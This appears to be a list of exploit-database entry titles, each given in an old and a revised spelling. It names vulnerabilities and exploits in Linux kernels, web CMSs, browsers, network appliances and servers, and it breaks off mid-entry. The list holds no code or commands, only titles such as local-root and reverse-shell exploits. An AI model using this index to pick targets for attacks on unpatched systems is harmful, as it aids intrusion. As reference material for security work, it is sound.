_newfunction_ Invalid Pointer Use Adobe Flash Player - 'newfunction' Invalid Pointer Use Unreal Tournament 2004 - _secure_ Overflow (Win32) Unreal Tournament 2004 - 'secure' Overflow (Windows) Unreal Tournament 2004 - _secure_ Overflow (Linux) Unreal Tournament 2004 - 'secure' Overflow (Linux) Tugux CMS 1.0_final Multiple Vulnerabilities Tugux CMS 1.0_final - Multiple Vulnerabilities Honey Soft Web Solution Multiple Vulnerabilities Honey Soft Web Solution - Multiple Vulnerabilities Joomla JCE Component (com_jce) Blind SQL Injection Vulnerability Joomla JCE Component (com_jce) - Blind SQL Injection Vulnerability Parnian Opendata CMS SQL Injection Vulnerability Parnian Opendata CMS - SQL Injection Vulnerability Time and Expense Management System Multiple Vulnerabilities Time and Expense Management System - Multiple Vulnerabilities ZyWALL USG - Appliance Multiple Vulnerabilities ZyWALL USG - Appliance - Multiple Vulnerabilities Cisco Unified Operations Manager Multiple Vulnerabilities Microsoft Windows Vista/Server 2008 - _nsiproxy.sys_ Local Kernel DoS Exploit Cisco Unified Operations Manager - Multiple Vulnerabilities Microsoft Windows Vista/Server 2008 - 'nsiproxy.sys' Local Kernel DoS Exploit HP Data Protector Client EXEC_SETUP Remote Code Execution PoC (ZDI-11-056) HP Data Protector Client 6.11 - EXEC_SETUP Remote Code Execution PoC (ZDI-11-056) HP Data Protector Client EXEC_CMD Remote Code Execution PoC (ZDI-11-055) HP Data Protector Client 6.11 - EXEC_CMD Remote Code Execution PoC (ZDI-11-055) Mozilla Firefox - _nsTreeRange_ Dangling Pointer Exploit Mozilla Firefox - 'nsTreeRange' Dangling Pointer Exploit Ollance Member Login Script Multiple Vulnerabilities Ollance Member Login Script - Multiple Vulnerabilities Adobe Reader X Atom Type Confusion Vulnerability Exploit Adobe Reader X 10.0.0 - 10.0.1 - Atom Type Confusion Vulnerability Exploit Mozilla Firefox _nsTreeRange_ Dangling Pointer Vulnerability Mozilla Firefox - 'nsTreeRange' Dangling Pointer Vulnerability Tradingeye E-commerce Shopping Cart Multiple Vulnerabilities Tradingeye E-commerce Shopping Cart - Multiple Vulnerabilities CA ARCserve D2D r15 GWT RPC Multiple Vulnerabilities Safari - SVG DOM Processing PoC CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities Safari 5.0.6_ 5.1 - SVG DOM Processing PoC Link Station Pro Multiple Vulnerabilities Link Station Pro - Multiple Vulnerabilities Cart Software Multiple Vulnerabilities Cart Software - Multiple Vulnerabilities Omnistar Mailer Multiple Vulnerabilities Omnistar Mailer - Multiple Vulnerabilities Linux Kernel - 'perf_count_sw_cpu_clock' event Denial of Service Linux Kernel 3.0.0 - 'perf_count_sw_cpu_clock' event Denial of Service Linux Kernel < 2.6.36.2 - Econet Privilege Escalation Exploit Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - Econet Privilege Escalation Exploit MYRE Real Estate Software Multiple Vulnerabilities MYRE Real Estate Software - Multiple Vulnerabilities Cisco TelePresence Multiple Vulnerabilities - SOS-11-010 Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities FreeBSD UIPC socket heap Overflow proof-of-concept FreeBSD - UIPC socket heap Overflow Proof of Concept GotoCode Online Bookstore Multiple Vulnerabilities GotoCode Online Bookstore - Multiple Vulnerabilities DivX Plus Web Player _file://_ Buffer Overflow Vulnerability PoC DivX Plus Web Player - 'file://' Buffer Overflow Vulnerability PoC EFront <= 3.6.9 Community Edition Multiple Vulnerabilities EFront <= 3.6.9 Community Edition - Multiple Vulnerabilities GotoCode Online Classifieds Multiple Vulnerabilities GotoCode Online Classifieds - Multiple Vulnerabilities 6kbbs Multiple Vulnerabilities 6kbbs - Multiple Vulnerabilities POSH Multiple Vulnerabilities POSH - Multiple Vulnerabilities NoNumber Framework Joomla! Plugin Multiple Vulnerabilities NoNumber Framework Joomla! Plugin - Multiple Vulnerabilities Uiga Personal Portal Multiple Vulnerabilities Uiga Personal Portal - Multiple Vulnerabilities Barter Sites 1.3 Joomla Component Multiple Vulnerabilities Barter Sites 1.3 Joomla Component - Multiple Vulnerabilities zFTP Server _cwd/stat_ Remote Denial-of-Service zFTP Server - 'cwd/stat' Remote Denial-of-Service JEEMA Sms 3.2 Joomla Component Multiple Vulnerabilities Vik Real Estate 1.0 Joomla Component Multiple Vulnerabilities JEEMA Sms 3.2 Joomla Component - Multiple Vulnerabilities Vik Real Estate 1.0 Joomla Component - Multiple Vulnerabilities ZTE ZXDSL 831IIV7.5.0a_Z29_OV Multiple Vulnerabilities ZTE ZXDSL 831IIV7.5.0a_Z29_OV - Multiple Vulnerabilities osCSS2 - __ID_ parameter Local file inclusion osCSS2 - '_ID' parameter Local file inclusion Infoproject Business Hero Multiple Vulnerabilities Infoproject Business Hero - Multiple Vulnerabilities SugarCRM CE <= 6.3.1 - _unserialize()_ PHP Code Execution SugarCRM CE <= 6.3.1 - 'unserialize()' PHP Code Execution ARYADAD Multiple Vulnerabilities Linux Kernel 2.6.39 <= 3.2.2 (32-bit & 64-bit) - Mempodipper Local Root (1) ARYADAD - Multiple Vulnerabilities Linux Kernel 2.6.39 <= 3.2.2 (32-bit & 64-bit) (Gentoo / Ubuntu) - Mempodipper Local Root (1) vBSEO <= 3.6.0 - _proc_deutf()_ Remote PHP Code Injection Exploit vBSEO <= 3.6.0 - 'proc_deutf()' Remote PHP Code Injection Exploit swDesk Multiple Vulnerabilities swDesk - Multiple Vulnerabilities Fork CMS 3.2.4 - Multiple Vulnerabilities (LFI/XSS) Fork CMS 3.2.4 - (LFI/XSS) Multiple Vulnerabilities DFLabs PTK <= 1.0.5 - Multiple Vulnerabilities (Steal Authentication Credentials) DFLabs PTK <= 1.0.5 - (Steal Authentication Credentials) Multiple Vulnerabilities HomeSeer HS2 and HomeSeer PRO Multiple Vulnerabilities HomeSeer HS2 and HomeSeer PRO - Multiple Vulnerabilities Adobe Flash Player .mp4 - 'cprt' Overflow_ Adobe Flash Player .mp4 - 'cprt' Overflow Wolfcms <= 0.75 - Multiple Vulnerabilities (CSRF - XSS) Wolfcms <= 0.75 - (CSRF/XSS) Multiple Vulnerabilities Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow_ Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow' MailMax <= 4.6 - POP3 - _USER_ Remote Buffer Overflow Exploit (No Login Needed) MailMax <= 4.6 - POP3 - 'USER' Remote Buffer Overflow Exploit (No Login Needed) Samsung D6000 TV Multiple Vulnerabilities Samsung D6000 TV - Multiple Vulnerabilities Websense Triton Multiple Vulnerabilities Websense Triton - Multiple Vulnerabilities QNX phrelay/phindows/phditto Multiple Vulnerabilities QNX phrelay/phindows/phditto - Multiple Vulnerabilities Lynx Message Server Multiple Vulnerabilities Lynx Message Server - Multiple Vulnerabilities SAP Netweaver Dispatcher Multiple Vulnerabilities SAP Netweaver Dispatcher - Multiple Vulnerabilities elearning server 4g Multiple Vulnerabilities elearning server 4g - Multiple Vulnerabilities Pro-face Pro-Server EX WinGP PC Runtime Multiple Vulnerabilities Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities Axous 1.1.1 - Multiple Vulnerabilities (CSRF - Persistent XSS) Axous 1.1.1 - (CSRF/Persistent XSS) Multiple Vulnerabilities Active Collab _chat module_ <= 2.3.8 - Remote PHP Code Injection Exploit Active Collab 'chat module' <= 2.3.8 - Remote PHP Code Injection Exploit SunOS <= 4.1.3 kmem setgid /etc/crash Vulnerability SunOS <= 4.1.3 - kmem setgid /etc/crash Vulnerability Linux kernel 2.0/2.1 - SIGIO Vulnerability Linux Kernel 2.0 / 2.1 - SIGIO Vulnerability Digital UNIX <= 4.0 D_FreeBSD <= 2.2.4_HP HP-UX 10.20/11.0_IBM AIX <= 3.2.5_Linux kernel 2.0/2.1_NetBSD 1.2_Solaris <= 2.5.1 - Smurf Denial of Service Vulnerability Linux Kernel 2.0/2.1_ Digital UNIX <= 4.0 D_ FreeBSD <= 2.2.4_ HP HP-UX 10.20/11.0_ IBM AIX <= 3.2.5_ NetBSD 1.2_ Solaris <= 2.5.1 - Smurf Denial of Service Vulnerability Microsoft Windows - _April Fools 2001_ Vulnerability Microsoft Windows - 'April Fools 2001' Vulnerability Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Dial-up Networking _Save Password_ Vulnerability Microsoft Windows NT <= 4.0 SP5_Terminal Server 4.0 - _Pass the Hash_ with Modified SMB Client Vulnerability Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking 'Save Password' Vulnerability Microsoft Windows NT <= 4.0 SP5_Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client Vulnerability Linux Kernel 2.2/2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options Vulnerability Linux kernel 2.0/2.1/2.2 - autofs Vulnerability Linux Kernel 2.0 / 2.1 / 2.2 - autofs Vulnerability QNAP Turbo NAS 3.6.1 Build 0302T Multiple Vulnerabilities QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities Linux kernel 2.0 - TCP Port DoS Vulnerability Linux kernel 2.2 - ldd core Vulnerability Linux Kernel 2.0 - TCP Port DoS Vulnerability Linux Kernel 2.2 - ldd core Force Reboot Vulnerability Linux kernel 2.0.33 - IP Fragment Overlap Vulnerability Linux Kernel 2.0.33 - IP Fragment Overlap Vulnerability Linux kernel 2.0/2.0.33 - i_count Overflow Vulnerability Linux Kernel 2.0 / 2.0.33 - i_count Overflow Proof of Concept IBM System Storage DS Storage Manager Profiler Multiple Vulnerabilities IBM System Storage DS Storage Manager Profiler - Multiple Vulnerabilities Linux kernel 2.0.37 - Segment Limit Vulnerability Linux Kernel 2.0.37 - Segment Limit Local Root Vulnerability BSD/OS <= 4.0_FreeBSD <= 3.2_Linux kernel <= 2.3_NetBSD <= 1.4 - Shared Memory Denial of Service Vulnerability Linux Kernel <= 2.3_ BSD/OS <= 4.0_ FreeBSD <= 3.2_ NetBSD <= 1.4 - Shared Memory Denial of Service Vulnerability Quinn _the Eskimo_ and Peter N. Lewis Internet Config 1.0/2.0 Weak Password Encryption Vulnerability Quinn 'the Eskimo' and Peter N. Lewis Internet Config 1.0/2.0 Weak Password Encryption Vulnerability Fujitsu Chocoa 1.0 beta7R _Topic_ Buffer Overflow Vulnerability Fujitsu Chocoa 1.0 beta7R - 'Topic' Buffer Overflow Vulnerability Linux kernel 2.0.30/2.0.35/2.0.36/2.0.37 - Blind TCP Spoofing Vulnerability Linux Kernel 2.0.30/2.0.35/2.0.36/2.0.37 - Blind TCP Spoofing Vulnerability Microsoft Internet Explorer 5.0 - ActiveX _Object for constructing type libraries for scriptlets_ Vulnerability Microsoft Internet Explorer 5.0 - ActiveX 'Object for constructing type libraries for scriptlets' Vulnerability Microsoft Internet Explorer 4.0/5.0 - ActiveX _Eyedog_ Vulnerability Microsoft Internet Explorer 4.0/5.0 - ActiveX 'Eyedog' Vulnerability Linux kernel 2.2 - Predictable TCP Initial Sequence Number Vulnerability Linux Kernel 2.2 - Predictable TCP Initial Sequence Number Vulnerability MediaHouse Software Statistics Server 4.28/5.1 - _Server ID_ Buffer Overflow Vulnerability MediaHouse Software Statistics Server 4.28/5.1 - 'Server ID' Buffer Overflow Vulnerability Tiki Wiki CMS Groupware <= 8.3 - _unserialize()_ PHP Code Execution Tiki Wiki CMS Groupware <= 8.3 - 'unserialize()' PHP Code Execution Debian 2.1_Linux kernel 2.0.x_RedHat 5.2 - Packet Length with Options Vulnerability Debian 2.1_ Linux Kernel 2.0.x_ RedHat 5.2 - Packet Length with Options Vulnerability Linux Kernel - fs/eventpoll.c Local Denial of Service Linux Kernel <= 3.2.24 - fs/eventpoll.c Local Denial of Service Netscape Enterprise Server _Novell Groupwise 5.2/5.5 GWWEB.EXE Multiple Vulnerabilities Netscape Enterprise Server_ Novell Groupwise 5.2/5.5 GWWEB.EXE - Multiple Vulnerabilities Netsweeper WebAdmin Portal Multiple Vulnerabilities Netsweeper WebAdmin Portal - Multiple Vulnerabilities Check Point Software Firewall-1 3.0/1 4.0_Cisco PIX Firewall 4.x/5.x _ALG_ Client Vulnerability Check Point Software Firewall-1 3.0/1 4.0_Cisco PIX Firewall 4.x/5.x - 'ALG' Client Vulnerability gpm 1.18.1/1.19_Debian 2.x_RedHat 6.x_S.u.S.E 5.3/6.x gpm Setgid Vulnerability gpm 1.18.1/1.19_ Debian 2.x_ RedHat 6.x_ S.u.S.E 5.3/6.x gpm Setgid Vulnerability Linux kernel 2.2.12/2.2.14/2.3.99_RedHat 6.x - Socket Denial of Service Linux Kernel 2.2.12/2.2.14/2.3.99_ RedHat 6.x - Socket Denial of Service Linux Kernel - Sendpage Local Privilege Escalation Linux Kernel 2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - Sendpage Local Privilege Escalation (Metasploit) kernel 2.2.x/2.4 .0-test1_SGI ProPack 1.2/1.3 - Capabilities Vulnerability (1) kernel 2.2.x/2.4 .0-test1_SGI ProPack 1.2/1.3 - Capabilities Vulnerability (2) Linux Kernel 2.2.x/2.4 .0-test1_ SGI ProPack 1.2/1.3 - Capabilities Local Root (sendmail) Vulnerability (1) Linux Kernel 2.2.x/2.4 .0-test1_ SGI ProPack 1.2/1.3 - Capabilities Local Root (sendmail <= 8.10.1) Vulnerability (2) Cart32 3.0 - _expdate_ Administrative Information Disclosure Vulnerability Cart32 3.0 - 'expdate' Administrative Information Disclosure Vulnerability DALnet Bahamut IRCd 4.6.5 - _SUMMON_ Buffer Overflow Vulnerability DALnet Bahamut IRCd 4.6.5 - 'SUMMON' Buffer Overflow Vulnerability BitchX IRC Client 75p1/75p3/1.0 c16 - _/INVITE_ Format String Vulnerability BitchX IRC Client 75p1/75p3/1.0 c16 - '/INVITE' Format String Vulnerability CVSWeb Developer CVSWeb 1.80 insecure perl _open_ Vulnerability CVSWeb Developer CVSWeb 1.80 - Insecure perl 'open' Vulnerability Microsoft IIS 5.0 - _Translate: f_ Source Disclosure Vulnerability (1) Microsoft IIS 5.0 - _Translate: f_ Source Disclosure Vulnerability (2) Microsoft IIS 5.0 - 'Translate: f' Source Disclosure Vulnerability (1) Microsoft IIS 5.0 - 'Translate: f' Source Disclosure Vulnerability (2) Solaris 2.6/7.0 - _eject_ Exploit for locale subsystem format string Solaris 2.6/7.0 - 'eject' Exploit for locale subsystem format string UoW Pine 4.0.4/4.10/4.21 - _From:_ Field Buffer Overflow Vulnerability UoW Pine 4.0.4/4.10/4.21 - 'From:' Field Buffer Overflow Vulnerability Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier Multiple Vulnerabilities Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier - Multiple Vulnerabilities Tickets CAD 2.20G Multiple Vulnerabilities Tickets CAD 2.20G - Multiple Vulnerabilities Cisco IOS 12 - Software _?/_ HTTP Request DoS Vulnerability Cisco IOS 12 - Software '?/' HTTP Request DoS Vulnerability Markus Triska CGIForum 1.0 - _thesection_ Directory Traversal Vulnerability Markus Triska CGIForum 1.0 - 'thesection' Directory Traversal Vulnerability Tunnelblick - Local Root Exploit Tunnelblick - Local Root Exploit (1) Windows 3.11/95/NT 4.0/NT 3.5.1 - _Out Of Band_ Data Denial of Service (1) Windows 3.11/95/NT 4.0/NT 3.5.1 - _Out Of Band_ Data Denial of Service (2) Windows 3.11/95/NT 4.0/NT 3.5.1 - _Out Of Band_ Data Denial of Service (3) Windows 3.11/95/NT 4.0/NT 3.5.1 - _Out Of Band_ Data Denial of Service (4) Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (1) Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (2) Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (3) Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (4) ReiserFS 3.5.28 Kernel - DoS (Possible Code Execution Vulnerability) (Linux Kernel) ReiserFS 3.5.28 - DoS (Possible Code Execution) Linux kernel 2.1.89/2.2.x - Zero-Length Fragment Vulnerability Linux Kernel 2.1.89 / 2.2.x - Zero-Length Fragment Vulnerability Linux sysctl() Kernel 2.2.x - Memory Reading Vulnerability Linux Kernel 2.2.x - sysctl() Memory Reading Proof of Concept Vulnerability IOServer _Root Directory_ Trailing Backslash Multiple Vulnerabilities IOServer - ('Root Directory'/Trailing Backslash) Multiple Vulnerabilities Linux kernel <= 2.2.18 - ptrace/execve Race Condition Vulnerability (1) Linux kernel <= 2.2.18 - ptrace/execve Race Condition Vulnerability (2) Linux Kernel <= 2.2.18 (RH 7.0 and RH 6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root Vulnerability (1) Linux Kernel <= 2.2.18 (RH 7.0 and RH 6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root Vulnerability (2) Linux kernel 2.4 - IPTables FTP Stateful Inspection Arbitrary Filter Rule Insertion Linux Kernel 2.4 - IPTables FTP Stateful Inspection Arbitrary Filter Rule Insertion Rit Research Labs _The Bat!_ 1.x - Missing Linefeeds DoS Vulnerability Rit Research Labs 'The Bat!' 1.x - Missing Linefeeds DoS Vulnerability Ad Manager Pro Multiple Vulnerabilities Ad Manager Pro - Multiple Vulnerabilities Linux kernel 2.2/2.4 - procfs Stream Redirection to Process Memory Vulnerability Linux Kernel 2.2 / 2.4 - procfs Stream Redirection to Process Memory Local Root Vulnerability HP-UX 11_Linux kernel 2.4_Windows 2000/NT 4.0_IRIX 6.5 - Small TCP MSS DoS HP-UX 11_Linux Kernel 2.4_Windows 2000/NT 4.0_IRIX 6.5 - Small TCP MSS DoS ID Software Quake 3 - _smurf attack_ Denial of Service Vulnerability ID Software Quake 3 - 'smurf attack' Denial of Service Vulnerability Linux kernel 2.2/2.4 - Deep Symbolic Link Denial of Service Vulnerability Linux Kernel 2.2 / 2.4 - Deep Symbolic Link Denial of Service Vulnerability Linux Kernel 2.2/2.4 - Ptrace/Setuid Exec Vulnerability Linux Kernel 2.2 / 2.4 - Ptrace/Setuid Exec Local Root Vulnerability Pinterest Clone Script Multiple Vulnerabilities Pinterest Clone Script - Multiple Vulnerabilities User-Mode Linux Kernel 2.4.17-8 - Memory Access Vulnerability User-Mode Linux Kernel 2.4.17-8 - Memory Access Local Root Vulnerability Sitecom MD-25x Multiple Vulnerabilities Reverse Root Shell Exploit Sitecom MD-25x - Multiple Vulnerabilitie/ Reverse Root Shell Exploit Ezylog Photovoltaic Management Server Multiple Vulnerabilities Ezylog Photovoltaic Management Server - Multiple Vulnerabilities Auxilium PetRatePro Multiple Vulnerabilities Netsweeper WebAdmin Portal Multiple Vulnerabilities Auxilium PetRatePro - Multiple Vulnerabilities Netsweeper WebAdmin Portal - Multiple Vulnerabilities Linux Kernel 2.2.x/2.3/2.4.x - d_path() Path Truncation Vulnerability Linux Kernel 2.2.x / 2.3 / 2.4.x - d_path() Path Truncation PoC Vulnerability Fortigate UTM WAF Appliance Multiple Vulnerabilities Fortigate UTM WAF Appliance - Multiple Vulnerabilities Working Resources BadBlue 1.7 EXT.DLL Cross-Site Scripting Vulnerability Working Resources BadBlue 1.7 - EXT.DLL Cross-Site Scripting Vulnerability Working Resources BadBlue 1.7.3 cleanSearchString() Cross-Site Scripting Vulnerability Working Resources BadBlue 1.7.3 Get Request Denial of Service Vulnerability Working Resources BadBlue 1.7.3 - cleanSearchString() Cross-Site Scripting Vulnerability Working Resources BadBlue 1.7.3 - Get Request Denial of Service Vulnerability Working Resources 1.7.3 BadBlue Null Byte File Disclosure Vulnerability Working Resources 1.7.3 BadBlue - Null Byte File Disclosure Vulnerability Working Resources 1.7.x BadBlue Administrative Interface Arbitrary File Access Working Resources 1.7.x BadBlue - Administrative Interface Arbitrary File Access Qualcomm Eudora 5 MIME Multipart Boundary Buffer Overflow Vulnerability Qualcomm Eudora 5 - MIME Multipart Boundary Buffer Overflow Vulnerability AFD 1.2.x Working Directory Local Buffer Overflow Vulnerabilities AFD 1.2.x - Working Directory Local Buffer Overflow Vulnerabilities Trillian 0.74 IRC PART Message Denial of Service Vulnerability Trillian 0.74 - IRC PART Message Denial of Service Vulnerability Linux Kernel 2.0.x/2.2.x/2.4.x_FreeBSD 4.x - Network Device Driver Frame Padding Information Disclosure Linux Kernel 2.0.x/2.2.x/2.4.x / FreeBSD 4.x - Network Device Driver Frame Padding Information Disclosure Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Vulnerability (1) Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Vulnerability (2) Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Vulnerability (1) Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Vulnerability (2) Invision Power Board <= 3.3.4 - _unserialize()_ PHP Code Execution Invision Power Board <= 3.3.4 - 'unserialize()' PHP Code Execution Linux kernel 2.2.x/2.4.x - I/O System Call File Existence Weakness Linux Kernel 2.2.x / 2.4.x - I/O System Call File Existence Weakness CheckPoint/Sofaware Firewall Multiple Vulnerabilities CheckPoint/Sofaware Firewall - Multiple Vulnerabilities Working Resources 1.7.x/2.15 BadBlue Ext.DLL Command Execution Vulnerability Working Resources 1.7.x/2.15 BadBlue - Ext.DLL Command Execution Vulnerability Working Resources BadBlue 1.7.x/2.x Unauthorized HTS Access Vulnerability Working Resources BadBlue 1.7.x/2.x - Unauthorized HTS Access Vulnerability Microsoft IIS 5 WebDAV - PROPFIND and SEARCH Method Denial of Service Vulnerability MYRE Realty Manager Multiple Vulnerabilities MYRE Realty Manager - Multiple Vulnerabilities Myrephp Business Directory Multiple Vulnerabilities MYREphp Vacation Rental Software Multiple Vulnerabilities Myrephp Business Directory - Multiple Vulnerabilities MYREphp Vacation Rental Software - Multiple Vulnerabilities BabyGekko 1.2.2e Multiple Vulnerabilities BabyGekko 1.2.2e - Multiple Vulnerabilities Linux kernel 2.2./2.4.x - /proc Filesystem Potential Information Disclosure Vulnerability Linux Kernel 2.2. / 2.4.x - /proc Filesystem Potential Information Disclosure Vulnerability Linux Kernel 2.4 - execve() System Call Race Condition Vulnerability Linux Kernel 2.4 - execve() System Call Race Condition PoC Vulnerability Aardvark Topsites 4.1 PHP Multiple Vulnerabilities Aardvark Topsites 4.1 PHP - Multiple Vulnerabilities phpwcms <= 1.5.4.6 - _preg_replace_ - Multiple Vulnerabilities phpwcms <= 1.5.4.6 - 'preg_replace' - Multiple Vulnerabilities KAME Racoon _Initial Contact_ SA Deletion Vulnerability lionmax software www file share pro 2.4x Multiple Vulnerabilities (1) lionmax software www file share pro 2.4x Multiple Vulnerabilities (2) KAME Racoon 'Initial Contact' SA Deletion Vulnerability lionmax software www file share pro 2.4x - Multiple Vulnerabilities (1) lionmax software www file share pro 2.4x - Multiple Vulnerabilities (2) DUware Software Multiple Vulnerabilities DUware Software - Multiple Vulnerabilities Linux Kernel Samba 2.2.8 - Share Local Privilege Elevation Vulnerability Linux Kernel Samba 2.2.8 (Debian/Mandrake) - Share Local Privilege Elevation Vulnerability ASP Portal Multiple Vulnerabilities ASP Portal - Multiple Vulnerabilities Working Resources BadBlue Server 2.40 phptest.php Path Disclosure Vulnerability Working Resources BadBlue Server 2.40 - phptest.php Path Disclosure Vulnerability SpiderSales 2.0 Shopping Cart Multiple Vulnerabilities SpiderSales 2.0 Shopping Cart - Multiple Vulnerabilities WarpSpeed 4nAlbum Module 0.92 modules.php gid Parameter SQL Injection WarpSpeed 4nAlbum Module 0.92 - modules.php gid Parameter SQL Injection Astium VoIP PBX <= 2.1 build 25399 - Multiple Vulnerabilities Remote Root Exploit Astium VoIP PBX <= 2.1 build 25399 - Multiple Vulnerabilities/Remote Root Exploit Linux Kernel 2.4/2.6 - Sigqueue Blocking Denial of Service Vulnerability Linux Kernel 2.4 / 2.6 - Sigqueue Blocking Denial of Service Vulnerability phpBugTracker 0.9 user.php bugid Parameter XSS phpBugTracker 0.9 - user.php bugid Parameter XSS Linux Kernel 2.5.x/2.6.x - CPUFreq Proc Handler Integer Handling Vulnerability Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling Vulnerability e107 website system 0.6 - _email article to a friend_ Feature XSS e107 website system 0.6 - 'email article to a friend' Feature XSS Rlpr 2.0 msg() Function Multiple Vulnerabilities Rlpr 2.0 msg() Function - Multiple Vulnerabilities Mozilla Browser 0.9/1.x Cache File Multiple Vulnerabilities Mozilla Browser 0.9/1.x Cache File - Multiple Vulnerabilities SCO Multi-channel Memorandum Distribution Facility Multiple Vulnerabilities SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities Working Resources BadBlue 1.7.x/2.x Unauthorized Proxy Relay Vulnerability Working Resources BadBlue 1.7.x/2.x - Unauthorized Proxy Relay Vulnerability Netgear SPH200D Multiple Vulnerabilities Netgear SPH200D - Multiple Vulnerabilities Fortinet FortiMail 400 IBE Multiple Vulnerabilities Fortinet FortiMail 400 IBE - Multiple Vulnerabilities Cisco Unity Express Multiple Vulnerabilities Cisco Unity Express - Multiple Vulnerabilities Linux Kernel - /dev/ptmx Key Stroke Timing Local Disclosure Linux Kernel <= 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure SAP Netweaver Message Server Multiple Vulnerabilities SAP Netweaver Message Server - Multiple Vulnerabilities Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Vulnerability Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Remote PoC Vulnerability Microsoft Internet Explorer 6.0_ Firefox 0.x_Netscape 7.x - IMG Tag Multiple Vulnerabilities Microsoft Internet Explorer 6.0_ Firefox 0.x_Netscape 7.x - IMG Tag - Multiple Vulnerabilities Ubuntu 12.10 - (64-Bit) sock_diag_handlers - Local Root Exploit Linux Kernel <= 3.7.10 (Ubuntu 12.10) (64-Bit) - sock_diag_handlers Local Root Exploit event calendar Multiple Vulnerabilities event calendar - Multiple Vulnerabilities opera Web browser 7.54 java implementation Multiple Vulnerabilities (1) opera Web browser 7.54 java implementation Multiple Vulnerabilities (2) opera Web browser 7.54 java implementation Multiple Vulnerabilities (3) opera Web browser 7.54 java implementation Multiple Vulnerabilities (4) opera Web browser 7.54 java implementation - Multiple Vulnerabilities (1) opera Web browser 7.54 java implementation - Multiple Vulnerabilities (2) opera Web browser 7.54 java implementation - Multiple Vulnerabilities (3) opera Web browser 7.54 java implementation - Multiple Vulnerabilities (4) ca3de Multiple Vulnerabilities ca3de - Multiple Vulnerabilities Vivotek IP Cameras Multiple Vulnerabilities Vivotek IP Cameras - Multiple Vulnerabilities Working Resources BadBlue 2.55 MFCISAPICommand Remote Buffer Overflow Vulnerability (1) Working Resources BadBlue 2.55 MFCISAPICommand Remote Buffer Overflow Vulnerability (2) Working Resources BadBlue 2.55 - MFCISAPICommand Remote Buffer Overflow Vulnerability (1) Working Resources BadBlue 2.55 - MFCISAPICommand Remote Buffer Overflow Vulnerability (2) Linux Kernel 2.6.x - SYS_EPoll_Wait Local Integer Overflow Vulnerability (1) Linux Kernel 2.6.x - SYS_EPoll_Wait Local Integer Overflow Vulnerability (2) Linux Kernel 2.6.x - SYS_EPoll_Wait Local Integer Overflow Local Root Vulnerability (1) Linux Kernel 2.6.x / <= 2.6.9 / <= 2.6.11 (RHEL4) - SYS_EPoll_Wait Local Integer Overflow Local Root Vulnerability (2) Linux Kernel 2.4.x/2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities Linux Kernel 2.4.x / 2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities Icecast 2.x - XSL Parser Multiple Vulnerabilities Icecast 2.x - XSL Parser - Multiple Vulnerabilities Linux Kernel 2.4.x/2.6.x - Bluetooth Signed Buffer Index Vulnerability (1) Linux Kernel 2.4.x/2.6.x - Bluetooth Signed Buffer Index Vulnerability (2) Linux Kernel 2.4.x/2.6.x - Bluetooth Signed Buffer Index Vulnerability (3) Linux Kernel 2.4.x/2.6.x - Bluetooth Signed Buffer Index Vulnerability (4) Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index PoC Vulnerability (1) Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index Local Root Vulnerability (2) Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index Local Root Vulnerability (3) Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index Local Root Vulnerability (4) Linux Kernel 2.6.37 <= 3.x.x - PERF_EVENTS Local Root Exploit Linux Kernel 2.6.37 <= 3.x.x (CentOS) - PERF_EVENTS Local Root Exploit MetaCart2 IntCatalogID Parameter Remote SQL Injection Vulnerability MetaCart2 StrSubCatalogID Parameter Remote SQL Injection Vulnerability MetaCart2 CurCatalogID Parameter Remote SQL Injection Vulnerability MetaCart2 - IntCatalogID Parameter Remote SQL Injection Vulnerability MetaCart2 - StrSubCatalogID Parameter Remote SQL Injection Vulnerability MetaCart2 - CurCatalogID Parameter Remote SQL Injection Vulnerability neteyes nexusway border gateway Multiple Vulnerabilities neteyes nexusway border gateway - Multiple Vulnerabilities McAfee IntruShield Security Management System Multiple Vulnerabilities McAfee IntruShield Security Management System - Multiple Vulnerabilities Gaim AIM/ICQ Protocols Multiple Vulnerabilities Gaim AIM/ICQ Protocols - Multiple Vulnerabilities bfcommand & control server 1.22/2.0/2.14 manager Multiple Vulnerabilities bfcommand & control server 1.22/2.0/2.14 manager - Multiple Vulnerabilities Linux Kernel <= 2.6 - Console Keymap Local Command Injection Vulnerability Linux Kernel <= 2.6 - Console Keymap Local Command Injection PoC QuickPayPro 3.1 